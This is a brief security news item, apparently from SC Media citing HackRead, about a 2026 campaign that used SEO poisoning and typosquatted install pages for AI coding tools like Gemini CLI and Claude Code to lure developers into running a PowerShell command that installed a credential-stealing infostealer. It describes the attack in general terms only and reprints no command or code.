Cybercriminals are using fake websites for popular artificial intelligence (AI) tools to trick software developers into downloading data-stealing malware. A recent campaign was first spotted on April 21, 2026, by an independent security researcher. Following this discovery, on May 21, 2026, the security research firm EclecticIQ released a full report showing that a single, financially motivated threat actor had been setting up malicious domains since early March 2026. This campaign specifically targets developers in the US and the UK by exploiting their trust in new AI utilities, as reported by HackRead.The attack campaign employs SEO poisoning to elevate fake installation pages in search engine results, leading developers searching for AI tools like Google Gemini CLI or Anthropic's Claude Code to typosquatted domains. These malicious sites meticulously mimic official vendor documentation. Upon visiting a fake Gemini page, users are prompted to execute a PowerShell command that downloads a fileless infostealer. This malware operates entirely in memory, disabling security features like AMSI and ETW before stealing credentials and session cookies from browsers and applications such as Slack, Microsoft Teams, and Discord. It also targets cryptocurrency wallets and cloud storage files. The campaign further includes a remote code execution feature, enabling direct network intrusion.Over 30 other fake domains targeting various developer tools are also active, with attackers even using a stolen Extended Validation certificate to bypass Windows security warnings. Developers are advised to verify download sources and scan files before execution.Source: HackRead
Get daily email updates
SC Media's daily must-read of the most current and pressing daily news
Related Terms
AdwareYou can skip this ad in 5 seconds